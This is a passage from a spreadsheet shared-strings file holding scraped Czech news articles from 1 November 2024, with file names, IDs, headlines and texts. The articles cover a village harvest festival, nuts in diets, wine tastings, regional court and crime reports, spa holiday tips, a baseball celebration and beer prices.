představení stejně jako její kolegové nenechá ujít.</t>
  </si>
  <si>
    <t>20241101_566_3240942892_58c9f08286f7f24ccae3.html</t>
  </si>
  <si>
    <t>58c9f08286f7f24ccae3</t>
  </si>
  <si>
    <t>Hodová chasa ve Zlámanci se po roční pauze opět vrátila na scénu</t>
  </si>
  <si>
    <t>Hodová chasa ve Zlámanci se po roční pauze opět vrátila na scénu pavel bohun Zlámanec – Po bohoslužbě u kaple Panny Marie Svatohostýnské v sobotu 26. října po poledni požehnal P. František Šary hodové právo a procesí krojovaných s dechovou hudbou Nedakoňanka v čele se vydalo na obchůzku obcí až k obecnímu úřadu. „Přivedl jsem novú najdějnú mladú chasu, pravda, ke kořalce majú eště chvílu času. Tak pane starosto, teď už enom povolení zbývá, však už sa nám pomály ztmívá,“ zahlásil před místní radnicí Radim, který stál v čele chasy. Vzápětí starosta Jiří Chmela hody pořádat posvětil. „A tož chaso, hody máte povolené, ať sa o nich vykládá aspoň čtyři neděle,“ naznačil starosta a zavdal tak důvod k propuknutí bujarého veselí, které vyvrcholilo vystoupeními krojovaných v kulturním domě a večer tamtéž hodovou zábavou s Nedakoňankou.</t>
  </si>
  <si>
    <t>20241101_567_3240941252_e08716822367d12bcbfc.html</t>
  </si>
  <si>
    <t>e08716822367d12bcbfc</t>
  </si>
  <si>
    <t>Jsou zdravé a vhodné do redukční diety. Přesto po nich můžete tloustnout</t>
  </si>
  <si>
    <t>Jsou zdravé a vhodné do redukční diety. Přesto po nich můžete tloustnout Že bychom neměli pít alkohol nebo se cpát hranolkami a koblihami, pokud nechceme tloustnout, víme určitě všichni. Jsou ale potraviny, které obsahují pro zdraví nezbytné látky, a neřekli bychom o nich, že by mohly mít na svědomí nežádoucí tuk usazený na břiše a stehnech. Patří k nim ořechy. olga tušicová Ořechy jsou nejen chutné, ale obsahují také kvalitní tuky, vitaminy, jsou bohaté na draslík a hořčík, antioxidanty i vlákninu. Zároveň jsou zdrojem nenasycených mastných kyselin, které chrání před aterosklerózou a infarktem. V čem je tedy problém? Právě v množství tuku, který je v oříšcích obsažený. V pouhých 30 gramech většiny druhů se skrývá 160 až 190 kalorií. KOLIK OŘECHŮ JE PŘIMĚŘENÉ? Do redukční diety jsou ořechy vhodné proto, že pomáhají se rychle a na delší dobu zasytit. Musí být ale v přiměřeném množství. „I zdravé tuky, které ořechy obsahují, musíte jíst s mírou, abyste se vyhnuli přibývání na váze. To znamená jednu polévkovou lžíci arašídového másla nebo hrst ořechů – ne celou sklenici,“ radí v magazínu AARP chirurg Felix Spiegel. Ať už budete jíst mandle, pistácie, vlašské, lískové, kešu, para nebo třeba pekanové ořechy, rozdíly v jejich kalorické hodnotě se významně neliší. Jen je potřeba si uvědomit, že například sníst jeden para ořech je stejné, jako sníst čtyři mandle. Významnou roli totiž hraje velikost. KOLIK OBSAHUJÍ TUKU, BÍLKOVIN A VLÁKNINY Magazín Health, web zaměřený na výživu, porovnal různé ořechy z hlediska obsahu tuku, bílkovin a vlákniny. Jako nejvhodnější do redukční diety vycházejí z porovnání jednotlivých druhů ořechů poměrně Relativně nízkou kalorickou hodnotou se mohou pochlubit také Kešu ořechy prospívají nervovému a imunitnímu systému. Porce 30 gramů kešu ořechů obsahuje 13,2 gramu tuku, 0,9 gramu vlákniny a 4,34 gramu bílkovin. Důležité je konzumovat je nepražené a nesolené. Také Brazilské para ořechy Pekanové ořechy</t>
  </si>
  <si>
    <t>20241101_568_3240939450_144160147c1b605b2418.html</t>
  </si>
  <si>
    <t>144160147c1b605b2418</t>
  </si>
  <si>
    <t>Jsou zdravé a vhodné do redukční diety. Přesto po nich můžete tloustnout Že bychom neměli pít alkohol nebo se cpát hranolkami a koblihami, pokud nechceme tloustnout, víme určitě všichni. Jsou ale potraviny, které obsahují pro zdraví nezbytné látky, a neřekli bychom o nich, že by mohly mít na svědomí nežádoucí tuk usazený na břiše a stehnech. Patří k nim ořechy. olga tušicová Ořechy jsou nejen chutné, ale obsahují také kvalitní tuky, vitaminy, jsou bohaté na draslík a hořčík, antioxidanty i vlákninu. Zároveň jsou zdrojem nenasycených mastných kyselin, které chrání před aterosklerózou a infarktem. V čem je tedy problém? Právě v množství tuku, který je v oříšcích obsažený. V pouhých 30 gramech většiny druhů se skrývá 160 až 190 kalorií. KOLIK OŘECHŮ JE PŘIMĚŘENÉ? Do redukční diety jsou ořechy vhodné proto, že pomáhají se rychle a na delší dobu zasytit. Musí být ale v přiměřeném množství. „I zdravé tuky, které ořechy obsahují, musíte jíst s mírou, abyste se vyhnuli přibývání na váze. To znamená jednu polévkovou lžíci arašídového másla nebo hrst ořechů ne celou sklenici,“ radí v magazínu AARP chirurg Felix Spiegel. Ať už budete jíst mandle, pistácie, vlašské, lískové, kešu, para nebo třeba pekanové ořechy, rozdíly v jejich kalorické hodnotě se významně neliší. Jen je potřeba si uvědomit, že například sníst jeden para ořech je stejné, jako sníst čtyři mandle. Významnou roli totiž hraje velikost. KOLIK OBSAHUJÍ TUKU, BÍLKOVIN A VLÁKNINY Magazín Health, web zaměřený na výživu, porovnal různé ořechy z hlediska obsahu tuku, bílkovin a vlákniny. Jako nejvhodnější do redukční diety vycházejí z porovnání jednotlivých druhů ořechů poměrně nízkokalorické mandle. Jsou přitom vynikající potravinou pro zdraví, a to díky vysokému obsahu vitaminu E, vlákniny, bílkovin, hořčíku a dalších minerálů. Porce 23 celých mandlí obsahuje 14,1 gramu tuku, 3,5 gramu vlákniny a 5,8 gramu bílkovin. Jen malá hrst, tedy asi 30 gramů mandlí, poskytuje kolem 80 miligramů hořčíku, což je 20 procent doporučeného denního příjmu. „Hořčík může navíc hrát roli v boji proti určitým druhům rakoviny,“ upozorňuje studie zveřejněná v lednu 2022, která vznikla pod vedením Jonase Lötschera z Fakultní nemocnice v Basileji . Relativně nízkou kalorickou hodnotou se mohou pochlubit také pistácie a oříšky kešu. Konzumace pistácií přitom může pomoci lepší funkci mozku a zdraví střev a kůže. Porce 30 gramů pistácií obsahuje 12,8 gramu tuku, 3 gramy vlákniny a 5,73 gramu bílkovin. Kešu ořechy prospívají nervovému a imunitnímu systému. Porce 30 gramů kešu ořechů obsahuje 13,2 gramu tuku, 0,9 gramu vlákniny a 4,34 gramu bílkovin. Důležité je konzumovat je nepražené a nesolené. Také arašídy (burské oříšky) bychom si měli dávat jen nesolené. Obsahují vitaminy E, B1 a B3, vápník, hořčík i draslík. Tyto látky chrání nejen srdce, ale snižují také riziko rozvoje cukrovky. Porce 30 gramů arašídů obsahuje přibližně 14 gramů tuku, 2,4 gramu vlákniny a 7 gramů bílkovin. Brazilské para ořechy obsahují velké množství selenu. I když je to významný antioxidant a má vliv na fungování štítné žlázy, nedoporučuje se jíst více než 1 až 3 para ořechy denně. Porce šesti para ořechů pak obsahuje asi 19 gramů tuku, 2 gramy vlákniny a 4,34 gramu bílkovin. Pekanové ořechy jsou zdrojem vlákniny, mědi, thiaminu a zinku. Pomáhají zlepšit poměr dobrého a špatného cholesterolu. Porce 30 gramů pekanových ořechů obsahuje asi 20 gramů tuku, 2,72 gramu vlákniny a 2,6 gramu bílkovin. Jakým ořechům se vyhýbat Důležité je vybírat si ořechy pražené na sucho a ne ty s extra solí, cukrem nebo oleji. Ani oříšky obalené čokoládovou či jogurtovou polevou plnou cukru a ztuženého tuku nejsou ani zdravou, ani dietní volbou. Všímejte si i barvy a chutě. Pokud mandle nebudou bílé, ale budou mít nažloutlou barvu, nekupujte je. Mohou být zkažené. Kvůli vysokému obsahu tuku ořechy i snadno žluknou. Pozor také na to, aby ořechy nebyly napadené plísněmi. OBLÍBENÉ VLAŠÁKY V České republice asi nejoblíbenější vlašské ořechy pak pro redukční dietu ideální nejsou. Zlepšují ale krevní tlak a pomáhají snížit hladinu špatného cholesterolu. Porce 30 gramů vlašských ořechů obsahuje 17 gramů tuku, 2 gramy vlákniny a 4 gramy bílkovin. Lískové oříšky mají podobné nutriční složení jako mandle, ale obsahují více kalorií. OŘECHY. Jsou plné zdravých tuků i bílkovin. Je ale důležité vědět, jaké ořechy a v jakém množství jíst, abyste hubli, a nezačali naopak tloustnout. Foto: Shutterstock</t>
  </si>
  <si>
    <t>20241101_569_3240939302_1290d7543012de59adaa.html</t>
  </si>
  <si>
    <t>1290d7543012de59adaa</t>
  </si>
  <si>
    <t>EDITORSKÝ VÝBĚR: zajímavosti z našeho webu vyskovsky.denik.cz</t>
  </si>
  <si>
    <t>EDITORSKÝ VÝBĚR: zajímavosti z našeho webu vyskovsky.denik.cz ● Přes 50 srážek se zvěří za půlrok. Škody na Vyškovsku přesáhly dva miliony ● Svatomartinská vína 2024. Ročník bude kvalitní, slibují vinaři z jihu Moravy ● Dobrá zpráva. Kraj zmírnil zákaz vstupu do lesů, platí i v části Vyškovska. ● Smrtelně nebezpečné silnice: pětkrát víc mrtvých než loni</t>
  </si>
  <si>
    <t>20241101_57_3264719139_6853429f717f6fe96e9e.html</t>
  </si>
  <si>
    <t>6853429f717f6fe96e9e</t>
  </si>
  <si>
    <t>Zapomeňte na vinobraní. Prahou poteče šťáva z&amp;nbsp;nejlepších francouzských hroznů</t>
  </si>
  <si>
    <t>Zapomeňte na vinobraní. Prahou poteče šťáva z&amp;nbsp;nejlepších francouzských hroznů Akce zvaná La Paulée se uskuteční 6. listopadu v Martinickém paláci na Pražském hradě. Je spojena nejen s odpolední degustací vín, ale také s galavečeří od šéfkuchaře Jana Punčocháře . Zážitek přivážejí Tereza a Karel Němečkovi z rodinné firmy VinoVinoVino . Skoro všichni znají beaujolais, jehož ochutnávka připadá na třetí čtvrtek v listopadu. Ale odteď se vám do mysli zaryje i La Paulée. Tradiční oslava konce sklizně vinné révy, která pochází z Burgundska a pro řadu vinařů představuje vrchol jejich roku. „Dnes se La Paulée proměnila ve významnou společenskou událost, která se koná po celém světě a setkávají se na ní vinaři a milovníci vína , aby společně oslavili úspěšnou sklizeň,“ vysvětluje Karel Němeček s tím, že nejznámější z těchto oslav se každoročně koná v burgundském městě Meursault . Prostory Martinického paláce, kde proběhne La Paulée | foto se svolením Vino Vino Vino Prostory Martinického paláce, kde proběhne La Paulée | Foto se svolením Vino Vino Vino Čím ale české podnikatele uchvátila právě burgundská vína ? V regionu totiž tráví každé léto a několikrát za rok se sem vrací. V Martinickém paláci hosté ochutnají vína i z regionů Champagne , Rhóny nebo Loiry. Kdo rád o víně hovoří, dostane příležitost setkat se s výrobci z těchto oblastí, které manželé Němečkovi považují za své blízké. Zároveň se lahve od některých z nich objevují na stolech michelinských restaurací. Foto se svolením Vino Vino Vino „Jsou to naši přátelé. V podstatě nabízíme pouze vína od vinařů, se kterými máme osobní a vřelé vztahy,“ vysvětluje Tereza Němečková , spolumajitelka VinoVinoVino . Němečkovi se ale nespecializují pouze na vína z Burgundska , do Česka už patnáct let vozí tento mok také z Německa či Rakouska . Foto se svolením Vino Vino Vino Doprovodem k vínu musí být i jídlo. Odpolední degustaci doplní delikatesy z restaurace Terroir. Večerní program zajistí galavečeře v režii šéfkuchaře Jana Punčocháře , která je už ovšem vyprodaná. Stále si můžete pořídit vstupenky na degustaci od 11 až 17 hodin v ceně 1590 korun. Autor: Anna Nosková Autor Anna Nosková</t>
  </si>
  <si>
    <t>20241101_570_3240939298_3a201c8efebe25357477.html</t>
  </si>
  <si>
    <t>3a201c8efebe25357477</t>
  </si>
  <si>
    <t>Rozsudek: Opilý otec, který vezl děti bez sedaček a zavinil jejich smrt, dostal sedm let</t>
  </si>
  <si>
    <t>Rozsudek: Opilý otec, který vezl děti bez sedaček a zavinil jejich smrt, dostal sedm let Vyškov Na sedm let a dva měsíce má jít do vězení otec, který letos v červnu řídil opilý, nedaleko Vyškova havaroval a způsobil tak smrt svých dvou dětí. Nebyly připoutané. Muže v úterý nepravomocně potrestal vyškovský okresní soud. O rozsudku informoval server idnes.cz. Jak Deník dříve informoval, k tragédii došlo v pátek 7. června letošního roku. Řidič jel po silnici II/430 ve směru z Rousínova do Vyškova velmi rychle, předjížděl, dostal smyk, vyjel mimo vozovku a skončil v poli. Zatímco dva dospělí muži v autě vyvázli bez zranění, dvě malé děti řidiče zemřely na místě. „V době nehody neseděly v dětských autosedačkách,“ informoval tehdy policejní mluvčí Petr Vala. Policisté řidiče podrobili zkoušce na drogy a na alkohol . V prvním případě vyšel test negativně, ve druhém byl výsledek pozitivní. (vd)</t>
  </si>
  <si>
    <t>20241101_571_3240939489_76313419b4ce4aae4396.html</t>
  </si>
  <si>
    <t>76313419b4ce4aae4396</t>
  </si>
  <si>
    <t>Proč nás sledování seriálů dělá šťastnějšími, ať už to uznáváme nebo ne</t>
  </si>
  <si>
    <t>Proč nás sledování seriálů dělá šťastnějšími, ať už to uznáváme nebo ne autor: Redakce Nezdrave.cz | 01.11.2024 | Kecy Sedíte na gauči, s prázdnou sklenicí vína v jedné ruce a ovladačem v druhé, a přemýšlíte, jestli se na Netflixu objeví nový hit, který vám rozjasní večer. Na jednu stranu jste si vědomi, že binge-watching není zrovna olympijský sport, ale na tu druhou, kdo by odolával lákavému světu plnému dramat, komedií a nečekaných zvratů? Váš mozek se prohání morfováním emocí a pravdou je, že sledování seriálů nás dělá šťastnějšími, ať už to přijímáme nebo ne. Podle výzkumu se ukazuje, že konzumace kvalitních příběhů nejen rozvíjí naši empatii, ale také zvyšuje úroveň štěstí, což je skvělé, protože to znamená, že můžete v klidu zahodit sebekritiku a sdílet své úspěchy na sociálních sítích. Kouzlo fiktivních hrdinů Jak se říká, fiktivní hrdinové mají schopnost nás proměňovat. Kdy jste se naposledy cítili jako superhrdina poté, co jste zkombinovali sledujícího hrdinu s kouskem pizzy? Příběhy z televizní obrazovky nám pomáhají utvářet naše hodnoty, styl a často i vzorce chování. Ať už se jedná o muže, který válí v byznysu nebo ženu, která se nebojí riskovat, hrdinové našich oblíbených seriálů nám dodávají odvahu a inspiraci a kolikrát na nás vlastně přenášejí i něco z jejich coolness. Vzpomínáte si, jak vás postavy dokázaly motivovat, i když jste si místo výběhu do parku vybrali pohodlí domova? Samozřejmě by tu bylo možné debatovat o tom, zda pamětihodné citáty ze seriálů jsou lepší než klasická moudra, ale jak jsem zmínil, tohle není o filosofii. Je to o jednoduchém úniku z reality a přitom o způsobu, jak obohatit naše životy. Televize nás učí osobní pokory, třebaže v úplně jiném kontextu. Zase zapomínám, že se někdo snaží dostat na Vrchol Žebříčku Úspěchu, místo aby si užíval tu instantní odměnu, kterou mu poskytuje uprostřed finále. Nuance a drobné detaily Pojďme se podívat na jeden zajímavý fakt: lidé, kteří sledují dramatické seriály jako “Game of Thrones” nebo “Breaking Bad”, mají sklon být více empatičtí a schopní nahlédnout do psychologií různých charakterů. Možná že rozporuplné postavy nás donutí zamyslet se nad hodnotami a rozhodnutími, které děláme v našem každodenním životě. Na rozdíl od reality, kde se spousta věcí zdá černobílá, prakticky za každým potrestáním obvykle netlačí ctnostný Morální Policajt. Tohle je ten rozdíl, kdy v životě ale bohužel nikdo velkolepě nevybuchuje jako v našich oblíbených víc než k popování. Nechme nyní stranou úvahy o humanistickém významu fikce. Móda sledování není pouze o příběhu, ale i o stylu, o spolupráci a o společnosti, kdy se klaníme gauči při sledování hlavního hrdiny, jak překonává výzvy. Město je plné drsňáků a funkubagů, ale v reálu máme tendenci zdržovat se od jakéhokoli stylu, který by nám mohl přinést pomyslné “okrášlení” našeho veřejného obrazu. To nám jasně říká, že ti, kteří tráví více času s dramatickými hrdiny, jsou také ti, kteří obvykle chození za hranicemi přijatého. Až se tedy příště usadíte na pohovce, vzpomeňte si, že i když se může zjevit pocit viny z klesající efektivity, pravdou zůstává, že se prostě děje život. Kdo by měl zrovna ztrácet čas se špatnými rozhodnutími, když příběhy z obrazovky nás mohou učit cenné lekce, a to jen s kupa popcornu. Takže do toho, zapněte ten Netflix a směle na klidnou jízdu, protože tvůrci těchto příběhů na nás mysleli, a chceme přeci jen cítit tu svobodu, i když je to po boku fiktivních hrdinů s jejich nesčetnými dramaty. Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>20241101_572_3241073696_d40b010a93c5ab6065bc.html</t>
  </si>
  <si>
    <t>d40b010a93c5ab6065bc</t>
  </si>
  <si>
    <t>Mejdan v šatně</t>
  </si>
  <si>
    <t>Mejdan v šatně Baseballisté Dodgers vyhráli Světovou sérii LOS ANGELES (en) – Trofej pro vítěze americké MLB putuje do Kalifornie ! Los Angeles Dodgers přejeli New York Yankees 4:1 na zápasy a po čtyřech letech ovládli ligu. V šatně pak rozjeli pořádnou párty! Oslavy si užíval i nejlépe placený hráč historie baseballu Shohei Ohtani (30), který si během desetiletého kontraktu ročně vydělá 1,6 miliardy korun. Teď při oslavách titulu vsadil na brýle, aby co nejvíce zakryl svou pozdější opilost. Titul se přece musí pořádně užít. Trofej v ruce a pivo v puse. Co víc si může šampion přát. Pivní sprchu schytal i Ohtani. Foto ČTK /AP</t>
  </si>
  <si>
    <t>661000</t>
  </si>
  <si>
    <t>20241101_573_3240667876_96c318482a21f2bce6b6.html</t>
  </si>
  <si>
    <t>96c318482a21f2bce6b6</t>
  </si>
  <si>
    <t>Vánoce a Silvestr v županu? Udělejte změnu a dopřejte si relax ve wellness</t>
  </si>
  <si>
    <t>Vánoce a Silvestr v županu? Udělejte změnu a dopřejte si relax ve wellness Sotva jsme se rozloučili s létem, načerpaná energie ze slunce a během dovolené už nám opět začíná ubývat. Chtělo by to tedy na chvíli zastavit a odpočinout si. Příležitost bude, a to během vánočních svátků. Zdá se vám to daleko? Vůbec ne, navíc je nejvyšší čas rezervovat si pobyt, chcete-li si užít opravdové hýčkání a neřešit úklid a vaření. Nemusíte jezdit daleko, u nás je krásně, se sněhem i bez něj. Takové wellness bude tou správnou aktivitou, která vám pomůže zvládnout vánoční čas a také zimní měsíce. Všichni to známe, předvánoční shon, kdy sháníme dárky, pečeme a uklízíme, pak přijdou Vánoce a nastává kolečko návštěv příbuzných, vaření a výsledkem všeho je, že jsme po svátcích vyčerpaní. Co na to jít jinak? Zvláště pokud nemáte děti, můžete za vším zavřít dveře a Vánoce a Silvestr si užít a pořádně si odpočinout. Odjeďte od starostí všedních dnů a dopřejte si relax ve wellness, lyžování nebo túry, zkrátka pohodu. Na Spa.cz si pohodlně vyfiltrujete pobyty v pěti různých zemích přesně vám na míru. Vybrali jsme pro vás několik tipů, kde strávit vánoční svátky v České republice a možná se vám stanou i inspirací na dárek v podobě voucheru. Klidné Vánoce plné pohody Lázně jsou pro odpočinek vždy dobrou volbou. V Mariánských Lázních , městě zapsaném na seznamu UNESCO, se například hned u hlavní kolonády nachází rozlehlý hotel Reitenberger Spa Medical, který nabízí balíček Vánoční lázeňský pobyt zahrnující slavnostní štědrovečerní večeři, relaxaci při lázeňských procedurách, a dokonce přímo na pokoj obdržíte dárek. Hotel poskytuje více než 60 procedur, rehabilitační a balneo centrum, wellness centrum či skvělou kuchyni ve dvou restauracích. Užívat si můžete také romantické procházky vánočně vyzdobeným městem, parky a kolonádami. V útulných kavárnách se zahřejete třeba svařeným vínem a věřte, že ani na chvilku nebudete litovat, že jste Vánoce pojali trochu jinak. Také Františkovy Lázně, kde vyvěrá 22 druhů minerálních pramenů, najdete na seznamu UNESCO a rozhodně by měly stát i na předních příčkách vašeho seznamu perfektních míst k odpočinku. Přímo v jejich historickém centru se nachází malebný hotel Bajkal připomínající zámeček. Balíček Vánoční svátky vám poskytne 7 pohodových dnů plných relaxace a lázeňských procedur, to vše provoněné vánočním pečivem a punčem z odpoledního rautu. Kromě bohatých možností trávení času, které nabízí samotný hotel, si zcela jistě užijete i procházky po městě či v jeho okolí. Toužíte-li spíše po horském prostředí, ač na sněhovou nadílkou visí otazník, pak se vaším cílem mohou stát Krušné hory . Ve zdejší krásné krajině, uprostřed lesů se nachází Pytloun Wellness Hotel Hasištejn, kde si pobyt užijí jak ti, co hledají odpočinek, tak i všichni, kteří nevydrží bez nějaké aktivity. Okolí hotelu nabízí množství turistických, cyklistických i běžeckých tras a aktivní odpočinek můžete posléze vykompenzovat relaxací v perfektně vybaveném wellness centru, kde si lze dopřát také nejrůznější masáže. V místní restauraci servírují české i mezinárodní lahůdky z čerstvých surovin od českých farmářů a k nim vybraná vína . Silvestr v lázních V případě, že vánoční svátky raději prožijete v rodinném kruhu, nebo si naopak budete chtít zasloužený odpočinek užívat déle, určitě si na Spa.cz projděte i možnosti silvestrovských pobytů. Vítat nový rok ve vířivce se sklenkou v ruce přece vůbec není špatný nápad. Již od Štěpána můžete prožívat svou zámeckou pohádku ve Vráži . Lázně Hotel Vráž v rámci balíčku Silvestrovský Štěpánský pobyt nabízejí nejen spoustu příjemných procedur jako například čokoládový zábal, ale také bohatý kulturní program včetně Silvestrovské noci a novoročního brunche. Hotel se nachází v budově novogotického zámku a je zasazen do romantické krajiny v údolí řeky Oravy . Kromě fitness a wellness aktivit jsou příjemné i procházky parkem nebo máte možnost dopřát si služby kadeřnice, kosmetičky či pedikérky a manikérky. Jídlo je servírováno v modré či žluté zámecké jídelně a odpolední kávu se zákuskem si vychutnáte v útulné zámecké kavárně. Řekněte, může být něco příjemnějšího? Někdo se nyní zasnil, ale jiní si říkají, že by jim chybělo město. V Lázeňském hotelu Royal si užijete jak klidu, tak blízkosti centra, a to Mariánských Lázní . Silvestrovské balíčky zde nabízejí hned dva – Silvestrovský relax, kdy vás čeká pořádné hýčkání, a Silvestrovský léčebný Vital plný lázeňských procedur, po nichž budete jako znovuzrození. Samozřejmostí je silvestrovský přípitek. Chcete-li si užít wellness a pohodové vítání nového roku, ale trochu se obáváte hotelů, kam jezdí celé rodiny, pak tu máme jeden tip přímo pro vás. Hotel typu Adults Only, kde nejmladšímu hostu může být 12 let. Naleznete ho v centru Luhačovic a jedná se o hotelový resort ALEXANDRIA Spa &amp;amp; Wellness hotel, kde v nabídce nechybí balíček Silvestrovský wellness s množstvím procedur a bohatým programem včetně silvestrovského galavečera. I když vás jistě dostatečně zaměstnají možnosti nejrůznější aktivity v rámci hotelu, doporučujeme nechat se alespoň na chvíli zlákat i procházkou po městě. Okouzlí vás rozmanitá architektura, kolonáda i okolní příroda působící jako velký park. Ať už se rozhodnete pro některý z našich tipů, nebo si najdete na Spa.cz jiné místo pobytu či zvolíte zcela jiný způsob strávení Vánoc a silvestrovské noci, důležité je pouze to, abyste si tyto chvíle užili v klidu, pohodě a s úsměvem na tváři. zdroj/foto: Spa.cz</t>
  </si>
  <si>
    <t>931</t>
  </si>
  <si>
    <t>877</t>
  </si>
  <si>
    <t>20241101_574_3240685260_6d73a5241e739aa0432e.html</t>
  </si>
  <si>
    <t>6d73a5241e739aa0432e</t>
  </si>
  <si>
    <t>Krimi zprávy z Vyškovska: Drogový gang i soud s otcem, který způsobil smrt dětí</t>
  </si>
  <si>
    <t>Krimi zprávy z Vyškovska: Drogový gang i soud s otcem, který způsobil smrt dětí SEDM LET. Na sedm let a dva měsíce má jít do vězení otec, který letos v červnu řídil opilý, nedaleko Vyškova havaroval a způsobil tak smrt svých dvou dětí. Nebyly připoutané. Muže v úterý nepravomocně potrestal vyškovský okresní soud. O rozsudku informoval server idnes.cz. play_fill Nehody DROGOVÝ GANG. Pětici mužů skončilo jejich podnikání. Na Vyškovsku i Prostějovsku totiž prodávali drogy a fungovali jako organizovaná skupina. V říjnových dnech bylo zahájeno trestní stíhání pěti podezřelých z trestného činu nedovolená výroba a jiné nakládání s omamnými a psychotropními látkami a s jedy. Krimi PŘIŠEL O DESÍTKY TISÍC. O více než padesát tisíc korun přišel muž z Vyškovska, když si chtěl koupit elektrokola z druhé ruky. Po zaplacení zálohy s ním prodávající přerušil kontakt, případ řeší policie. O podvodu informovala koncem října. Krimi HLEDÁNÍ SVĚDKŮ. K první nehodě došlo v Drnovicích , k další u Kobeřic. S objasněním dvou havárií na Vyškovsku potřebují pomoc policisté. V uplynulých dnech se proto obrátili s prosbou na případné svědky. Nehody TÝRÁNÍ NEZLETILÝCH SYNŮ. Krajský soud v Brně desátého října potvrdil podmíněný trest odnětí svobody s odkladem na čtyři roky muži z Vyškova za týrání svých dvou nezletilých synů. Soud dále muži nařídil odborný dohled. V případě porušení podmínek mu hrozí nepodmíněný tříletý pobyt ve věznici s ostrahou. Podrobnosti si přečtete ZDE . close info Zdroj: Deník/Ondřej Srba zoom_in Soudní jednání Krajského odvolacího soudu s mužem z Vyškova . MAPA KRIMINALITY. Krádeže, vloupání, násilí, ale i drogy. Za poslední rok řešili policisté na Vyškovsku stovky trestných činů. Díky webovému portálu kriminalita.policie.cz se můžete nyní podívat, kde ve městech je nejvíce nebezpečno. Vyškovsko NEHODA NA D46. K vážné nehodě motorkáře došlo v neděli dvacátého října na dálnici D46 u Pustiměře . Havárie omezovala během odpoledne ve vytížené lokalitě na Vyškovsku dopravu. Záchranáři na místo museli vyslat vrtulník. Nehody JÍZDA V OPILOSTI. Řidič na Vyškovsku nadýchal přes dvě promile, další v centru Brna naboural v opilosti hned pět aut. O případech řízení pod vlivem alkoholu na jihu Moravy informovali v úterý dvaadvacátého října policisté. Nehody Autor: Jakub Dostál Autor Jakub Dostál</t>
  </si>
  <si>
    <t>7130</t>
  </si>
  <si>
    <t>2080</t>
  </si>
  <si>
    <t>20241101_575_3241316382_c689d292be41d270ea70.html</t>
  </si>
  <si>
    <t>c689d292be41d270ea70</t>
  </si>
  <si>
    <t>Můžeme si dovolit dvanáctkrát více piv než za první republiky. Pijeme proto častěji?</t>
  </si>
  <si>
    <t>Můžeme si dovolit dvanáctkrát více piv než za první republiky. Pijeme proto častěji? Rubrika: / NAKONEC / Cena piva je dnes podle posledních údajů toho nejlepšího a nejvyváženějšího měřítka, které máme – podle Českého statistického úřadu –, úplně stejná, jako byla na začátku roku. Vzhledem k tomu, že nám mezitím od začátku roku stouply mzdy a platy zhruba o pět procent, je tak dnes pivo reálně o pět procent levnější než v lednu. Namísto půllitru si dnes můžeme dovolit o čtvrt deci více. Mezitím na jaře však ceny byly vyšší než dnes, takže teď v posledních měsících spíše klesaly. Pivo tedy nyní pomáhalo snižovat celkovou inflaci. Nebýt jej, byla by vyšší. Výhoda dvou příjmů V době 106. výročí vzniku první Československé republiky se ale podívejme, kolik stálo pivo tehdy. Například v roce 1928 stálo jenom jednu korunu padesát. To znamená, že na koruny bylo zhruba osmkrát levnější než dnes. Takové srovnání by se dalo udělat, kdyby tehdy lidé brali tolik jako dnes, tedy v průměru zhruba 46 tisíc měsíčně. To ale nebrali ani zdaleka. Průměrné příjmy známe oficiálně až od roku 1930, kdy převýšily 700 korun měsíčně, takže něco je třeba dopočítat. Za první republiky si mohl pracující dovolit zhruba 500 piv měsíčně. Dnes je to více než 3500 piv . Za každé jedno prvorepublikové pivo si jich dnes může pracující dovolit více než sedm. A to přitom nezapočítáváme, že zatímco dnes typická mediánová rodina žije ze dvou příjmů, za první republiky to bylo zpravidla jen z jednoho. Tedy přepočítáno na typický příjem rodiny (a nikoli typického pracujícího) si dnes piva můžeme dovolit zhruba dvanáctkrát více. Zčásti to je tím, že je naše práce mnohem produktivnější, a tak si reálně více vyděláme. To samozřejmě neznamená, že když je dnes pivo dvanáctkrát levnější, že jej vypijeme dvanáctkrát více. Oproti roku 1928 dnes jeden obyvatel Česka vypije zhruba jen o polovinu piva více. Ale tehdejší průměr velmi snižovali obyvatelé Moravy . Tři největší pivovary Československa byly na území Čech a stejně jako dnes jim všem kraloval Měšťanský pivovar v Plzni . Když porovnáme spotřebu piva čistě za obyvatele Čech , ti dnes vypijí „jen“ o třetinu více. Zručnost sládků Druhým důvodem toho, proč si dnes můžeme dovolit dvanáctkrát více než v době první republiky, je neustále se zlepšující umění a profesionalita sládků. Že máme dnes levnější elektroniku, nikoho nepřekvapí. Lidé za těch 100 let vymysleli chytřejší technologie. Že máme dnes levnější nábytek, by nás také nemělo překvapit. Dřevo je stále stejné, jen dnes vše vyrábějí roboty. A navíc si dnes nábytek musíme sešroubovat sami a výrobce ušetří za skladové prostory. Ale pivo mělo nesrovnatelně složitější stoletou cestu k reálnému zlevnění. Nejen že nenechává na nás, abychom si ho sami složili či „namíchali“, ale tekutina není stlačitelná, tak nic neušetří ani za skladovací prostory. A to se přitom – oproti nábytku nebo třeba i limonádám – neustále proměňují vstupní ingredience. Ječmen, chmel a všechno ostatní se liší nejen podle místa sklizně, ale i podle roku sklizně. Vinař té proměnlivosti smí říkat „ročník“. Uvařit z měnících se vstupů ve velkém pivovaru každý rok stále stejně kvalitní pivo – a ještě k tomu stále levněji – za to si dnes sládkové zaslouží přípitek. Oproti roku 1928 dnes jeden obyvatel Česka vypije zhruba o polovinu piva více. foto Shutterstock Autor: Petr Bartoň datový ekonom Datarunu Autor Petr Bartoň Rubrika transition_slide / NAKONEC /</t>
  </si>
  <si>
    <t>20241101_576_3241129800_4250e0f3ee8e685a50ff.html</t>
  </si>
  <si>
    <t>4250e0f3ee8e685a50ff</t>
  </si>
  <si>
    <t>GÓÓL Benátek ! Jako vítězství v Lize mistrů</t>
  </si>
  <si>
